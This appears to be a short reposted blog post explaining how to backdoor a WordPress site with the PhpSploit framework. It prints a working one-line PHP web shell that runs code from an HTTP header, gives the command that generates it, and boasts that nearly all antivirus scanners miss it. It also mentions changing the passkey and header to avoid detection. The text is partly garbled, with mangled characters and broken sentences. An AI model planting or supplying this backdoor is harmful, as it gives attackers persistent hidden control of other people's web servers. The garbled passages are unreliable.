Backdooring WordPress with Phpsploit

11/23/2020


Backdooring WordPress with Phpsploit:

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

download https://github.com/nil0x42/phpsploit

When running Phpsploit and generating a standard backdoor to place in WordPress or PHP-code it looks like this:

<?php @eval($_SERVER[‘HTTP_PHPSPL01T’]); ?>

The above code can be generated by running the following command:

./phpsploit --interactive --eval "backdoor"

And if we insert this little eval-code snippet into a WordPress php-file and then upload the file to VirusTotal the detection rate looks like this for the 58 different antivirus-scanners currently online virus total

ust one hit and it is ClamAV detecting the backdoor as Php.Trojan.PhpSploit-7157376-0.

If we then run phpsploit again and set another PASSKEY 

as exampleAnd should be quite easy to trigger IDS alerts at network level since PHP-code like eval and base64_decode should not be a part of a http-header. This can also of course be changed in Phpsploit by using the command set REQ_HEADER_PAYLOAD.


from : wpsec

0 Comments